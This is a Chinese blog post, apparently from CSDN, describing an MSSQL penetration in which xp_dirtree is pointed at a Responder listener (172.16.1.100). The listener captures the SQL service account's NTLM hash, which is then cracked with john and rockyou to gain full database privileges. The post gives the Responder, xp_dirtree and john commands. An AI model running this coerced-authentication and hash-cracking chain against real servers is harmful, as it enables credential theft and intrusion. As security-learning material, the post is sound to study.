浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击

最新推荐文章于 2024-05-26 16:34:10 发布
最新推荐文章于 2024-05-26 16:34:10 发布
阅读量3.3k 收藏 6
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60115503/article/details/124120094
版权

LIMNR是什么?

链路本地多播名称解析(LIMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机,当局域网中的DNS服务器不可用时,DNS客户端会使用LIMNR本地链路多播名称解析来解析本地的主机名称

NetBIOS是什么?

Netbios(Network Basic Input Output System):网络基本输入输出系统,提供OSI模型中的会话层服务,分享数据,是一种应用程序接口API同时系统可以利用WINS服务将NetBIOS名解析为相应IP地址,局域网都是在NetBIOS协议的基础上工作的

当dns解析发送错误时,LLMNR(链路本地多播名称解析)和NBT-NS会代替解析

        监听LLMNR和NetBIOS协议的可以使用Metasploit或者Responder工具

Responder工具使用

        下载地址:Responder下载

        Responder是监听LLMNR和NetBIOS协议的工具之一,能够抓取网络中的所有LLMNR和NetBIOS请求并进行响应,获取最初的账户凭证,可以利用内置SMB,MSSQL,HTTP,DNS,POP3,FTP等服务器,收集目标文件的凭证

responder -h

responder -I <网卡> -i <ip地址>

记录一次mssql渗透

        通过SMB得到mssql用户并且进行mssql数据库登录,执行xp_cmdshell发现无权限开启

         发现可以执行扩展存储xq_dirtree

        配合xp_dirtree存储过程获取运行mssql服务的用户NTLM的hash值,原理是通过LLMNR/NBT-NS欺骗攻击,让MSSQL去访问我们伪造的服务,当MSSQL去执行时就会把它自己的凭证发给我们,我们通过破解它的凭证在返回登录MSSQL,得到最高权限具体操作

使用命令responder-I eth0 -i ip地址

回到mssqlclient.py的命令窗口中,执行命令xp_dirtree "\\172.16.1.100\test" 然后回到Responder观察监听信息 

 导入一个文件里面 使用jhon破解

jhon --wordlist=/usr/share/wordlists/rockyou.txt <文件名>

最后破解到密码重新登录mssql得到最高权限

QiaN_djx
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mssql数据库渗透测试
weixin_63787130的博客
03-21 124
学习mssql渗透
MSSQL注入PUBLIC权限下的xp_dirtree再度利用
Information Security Technology Organization
08-10 2815
软件作者:kj021320信息来源:I.S.T.O技术团队(http://blog.csdn.net/I_S_T_O/)本来这文章在TEAM里面放了好久的了!只是>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...正文:提起public权限的用户估计很多人也
实战复盘:内网环境渗透ms-SQL数据库
最新发布
2401_84466227的博客
05-26 1148
鼠标放到下面蓝色区域,右键选择 as Escaped String,再粘贴到编辑器中,变成如下图所示,需要手工处理一下,对照上副图,下图中删除白底数据,保留蓝底数据,然后删除头尾的引号、斜杠等,使它变成一个标准的二进制格式的字符串,它就是我们抽取的原始sql字符串,然后,复制到后面sql_replace.js截图的第7行。-----表示替换失败。第一个是onLoad(),bettercap运行成功后,会在屏幕上提示:tcp module loader ----------------;
Metasploit-MSSQL渗透-实战篇
热门推荐
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
未能找到存储过程 master.dbo.xp_dirtree|错误2812
weixin_30443895的博客
03-21 263
未能找到存储过程 master.dbo.xp_dirtree|错误2812 解决未能找到存储过程 master.dbo.xp_dirtree 把恢复数据库需要用到的存储过程个恢复 打开MSSQL查询分析器,分别运行下面的两条数据库语句即可. ...
Windows2003服务器安装及设置教程之十六MSSQL安全篇.doc
07-07
在Windows 2003服务器环境中,MSSQL Server的安全性是至关重要的,因为它承载着大量的数据和服务。这篇教程详细介绍了如何确保SQL Server的安全,主要分为两个部分:将MSSQL Server运行在普通用户下以及删除危险的...
mssql注入艰难拿站1
08-03
【扩展存储过程的限制】攻击者发现`xp_regwrite`和`xp_dirtree`等扩展存储过程被禁用,这意味着列目录或执行某些系统命令的功能受到了限制。 【获取驱动器信息】利用`CREATE TABLE`和`INSERT INTO`创建并填充一个...
MSsqlL注入取得网站路径最好的方法.txt
07-18
在MSsqlL注入中,获取网站路径通常是攻击者感兴趣的目标之一。通过这些路径信息,攻击者可能进一步定位到敏感文件的位置,甚至实现对整个系统的控制。下面介绍一种有效的方法来获取网站路径: ### 方法步骤详解 ##...
mssql存储过程用法.txt
07-18
### MSSQL存储过程用法详解 #### 一、概述 在数据库管理与应用开发中,存储过程(Stored Procedure)是一种预编译好的SQL脚本,它可以在数据库服务器上执行,并返回结果集或状态码。存储过程可以提高应用程序的...
渗透入侵\mssql注射.zip
07-15
渗透入侵\mssql注射
目录结构生成器DirTree,可手动修改生成文件(txt、xlsx等)
10-13
DirTree:构建与自定义目录结构的利器》 在IT行业中,管理和组织文件和目录是日常工作的重要组成部分。为了高效地处理复杂的文件系统,我们常常需要一种工具来快速生成和编辑目录结构。DirTree就是这样一款实用的...
MSSQL内网渗透案例分析
weixin_30322405的博客
11-12 184
主题:MSSQL内网渗透案例分析 发表:黑白前线 友情提交到t00ls.net 与某菜菜们分享注:附件太多了,就引用站上的图片吧。高手老鸟飘过!描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。 环境:2003 SER...
渗透测试之地基服务篇:服务攻防之数据库Mssql(上)
m0_59598029的博客
07-31 101
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析
weixin_33722375的博客
05-15 204
图文:udb311主题:MSSQL内网渗透案例分析发表:黑白前线描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。环境:2003 SERVERIIS :6.0 支持php数据库:MSSQL和MYSQL网站类型:ASPX本...
[渗透测试篇]数据库系统渗透之Mssql提权
qq_43668710的博客
04-18 413
提上日程,月末之前完成
MSSQL注入PUBLIC权限下的xp_dirtree再度利
rjgcwl的专栏
01-15 1186
MSSQL注入PUBLIC权限下的xp_dirtree再度利 文章作者:kj021320信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本来这文章在TEAM里面放了好久的了!只是>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005
SQL Sever中可以使用哪个存储过程调用操作系统命令,添加系统账号?() xp_dirtree xp_cmdshell xp_xshell xpdeletekey
06-12
SQL Server中可以使用 `xp_cmdshell` 存储过程调用操作系统命令,但是不能用于添加系统账号。`xp_cmdshell` 存储过程可以在 SQL Server 中执行任意的操作系统命令,比如创建、删除、移动文件等等。但是,这个存储过程需要特殊的权限才能执行,因此应该谨慎使用。至于添加系统账号,这是一个非常危险的操作,一般情况下不应该使用存储过程来实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值